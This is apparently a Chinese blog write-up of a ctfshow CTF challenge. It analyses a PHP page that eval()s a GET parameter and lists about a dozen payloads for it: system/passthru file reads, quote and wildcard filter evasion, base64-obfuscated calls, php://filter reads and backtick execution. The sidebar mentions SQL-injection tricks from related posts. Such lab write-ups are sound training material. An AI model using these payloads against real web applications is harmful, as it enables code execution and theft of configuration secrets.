【WEB】ctfshow-萌新-web9-15

已于 2024-07-31 15:41:23 修改
阅读量567 收藏 2
点赞数 22
分类专栏: CTF 文章标签: 网络安全 安全 CTF 渗透测试
于 2024-07-31 15:39:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LongL_GuYu/article/details/140824545
版权

文章目录

题目介绍:

ctfshow-萌新计划-web9-15

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

题目分析:

  1. 包含配置文件

    • include("config.php");
    • 这行代码包含了一个名为config.php的文件,该文件可能包含一些配置信息,比如flag。

  2. 检查GET参数c是否存在

    • if(isset($_GET['c'])){ ... }
    • 这段代码检查是否有通过GET方法提交的c参数。

  3. 获取c参数的值

    • $c = $_GET['c'];
    • 将GET参数c的值赋给变量$c

  4. 正则表达式匹配

    • if(preg_match("/system|exec|highlight/i",$c)){ ... }
    • 使用preg_match函数检查变量$c是否包含systemexechighlight这些字符串(不区分大小写)。这个正则表达式检查的目的是尝试防止某些特定的命令执行函数被调用。

  5. 执行代码

    • eval($c);
    • 如果正则表达式匹配成功,eval函数将执行变量$c中包含的PHP代码。这是一个非常危险的操作,因为它允许执行任意PHP代码,可能导致严重的安全问题。

  6. 错误处理

    • die("cmd error");
    • 如果正则表达式没有匹配,脚本将终止执行并输出错误信息。

  7. 高亮显示当前文件

    • highlight_file(__FILE__);
    • 如果没有提交c参数,脚本将使用highlight_file函数显示当前脚本文件的源代码。

payload:

?c=system('cat config.php');

?c=system('tac config.php');

?c=show_source('config.php');

?c=passthru('tac config.php');

?c=passthru('more config.php');

?c=passthru('more confi***hp');

?c=passthru('tac con\fig*')?>

?c=passthru('c""at con""fig?ph""p')?>

?c=passthru("ca''t `ls`")?>

?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);

?c=$a=opendir('/var/www/html');$e=readdir($a);$e=readdir($a);$e=readdir($a);echo%20readfile($e);

?c= include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php

?c=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php

?a=cat config.php&c=echo`$_REQUEST[a]`;

……

我不会接受我不要的未来,哪怕是命中注定。

Long._.L
关注
  • 22
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-WEB-萌新赛-wp
F1rstb100d
09-03 613
ctfshow-WEB-萌新赛-wp
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 979
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
ctfshow-WEB-web9( MD5加密漏洞绕过)
热门推荐
wangyuxiang946的博客
09-05 1万+
ctf.show WEB模块第9关是一个SQL注入漏洞, SQL中使用MD5进行加密, 推荐使用MD5加密漏洞绕过 进去以后就是一个登录界面, 盲猜是个SQL注入漏洞 首先, 我们访问根目录下的 robots.txt 文件 robots.txt是一个文本文件,同时也是一个协议,规定了爬虫访问的规则( 哪些文件可以爬取,哪些文件不可以爬取) 从robots.txt文件的内容中可以发现, 作者给了提示, index.phps文件应该就是此关卡的源码文件 接下来...
CTFshow-web-web9
qq_68581192的博客
10-12 135
而 Mysql 刚好又会把 hex 转成 ascii 解释,因此拼接之后的形式是1select * from ‘admin’ where password=’’ or ‘6xxxxx’,等价于 or 一个永真式,因此相当于万能密码,可以绕过md5()函数。发现SQL中使用了md5()函数加密,我们可以利用MD5加密漏洞来绕过,发现还不能超过10,不然会显示错误。访问/index.phps文件,将其下载至本地,打开,显示如下。输入密码ffifdyop,显示如下,flag出现。所以用ffifdyop绕过。
CTFSHOW 萌新 web9 解题思路和方法(利用system函数执行系统命令)
最新发布
weixin_58052886的博客
08-03 281
因为题目中提示flag在config.php文件中,所有可以直接读取该文件。当然,如果题目中没有说明falg在那个文件中,我们可以使用。查看所有文件内容,然后从结果中查询。
ctfshow-web9
HAI_WD的博客
08-17 145
看到md5,参考这个https://blog.csdn.net/HAI_WD/article/details/132345156?拿到一个站的时候一定要看robots.txt文件。看到一个phps,然后下载一下。
CTF show WEB9
羽的博客
02-16 3909
题目地址https://ctf.show 尝试简单的万能密码以及过滤绕过,各种方法均没有回显。 查看网站源代码, 没有提示。 这时候猜测可能有其他页面,直接后台目录扫描,发现index.phps源代码文件。 发现有这么一行 $sql="select * from user where username ='admin' and password ='".md5($password,true)."'...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web 9
trytowritecode的博客
10-20 564
分享一道很有意思的题目 前面好几道题都是sql注入的语句,这边也下意识想着是sql注入,然后测试了很多sql语句发现行不通 就觉得该换个思路 那就扫描下目录吧(我发现dirmap的字典有点拉胯不知道为什么)用dirmap啥都扫不出来于是就换了 dirsearch然后去扫扫出了一个robots.txt 然后就是访问这个地址给你一个下载链接我们直接打开得到 <?php $flag=""; $password=$_POST['password']; if(strlen($pass
[ctfshow-web-9]
L1ni01
11-17 286
[ctfshow-web-9] 这题考验MD5加密后的SQL 注入 题解: 在robots.txt 发现提示信息。 打开有源码 <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from user where username ='admin' and password ='".md5
CTF.show:web9
qq_46230755的博客
01-15 596
打开题目发现有注入框,简单的注入测试后发现没有效果,扫描一下,发现存在robots.txt 进入robots.txt查看文件 下载后打开发现有源代码 <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from user where username ='admin' and pass
CTFSHOW web入门——web9
m0_74093152的博客
02-05 245
CTFSHOWweb入门——web9
ctfshow-web9(奇妙的ffifdyop绕过)
Welcome To Myon'Blog !
10-09 708
这里执行了 SQL 查询并将结果存储在 $result 变量中,然后通过 mysqli_num_rows($result) 检查返回的结果集中是否有行数大于0的数据,如果有,表示登录成功,就会输出flag。这段代码构建了一个 SQL 查询,但是它没有对用户输入进行适当的过滤或净化,很可能存在SQL注入,并且密码在数据库中储存为 MD5 散列值。首先验证用户提交的密码是否超过10个字符,如果超过,就终止脚本并显示密码错误消息。or后面的第一个字母只要不是0,都会被认为是true,从而实现sql注入的绕过。
CTFSHOW系列-web9(信息收集-swp泄露)
siu~
11-25 490
CTFSHOW系列解题思路
ctfshow---萌新---web9
2201_75556700的博客
04-29 460
2、flag就在config.php中,需要以c为变量名传入一个参数,且参数是preg_match中的任意一个。4、接着读取config.php中的内容,并输出到页面中?
CTFshow---WEB入门---web9
qq_43752749的博客
12-11 722
思考该场景原来存在index.php,网站管理员使用vim对index.php进行修改后非法退出,运营网站的操作系统的网站目录下生成index.php.swp文件,使得黑客可以恶意访问该临时文件从而获取网站源码。根据提示,网页在vim中修改后非正常退出,会生成.swp临时文件,该文件保存中断前原文件写入的信息。查看index.php.swp文件,存在该文件下载后打开。
ctfshow萌新web
09-02
ctfshow萌新web是一个CTF比赛中的题目,具体是关于web安全的。根据引用[1]和引用所提到的内容,这道题目涉及到了使用intval函数获取敏感数据的特性。在解题过程中,我们需要通过绕过某些过滤条件,使得传入的参数id可以被判断为1000,从而获取到flag。在解这道题之前,需要有一些关于web安全的基础知识准备工作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFShow:萌新web1](https://blog.csdn.net/weixin_64089259/article/details/130144716)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值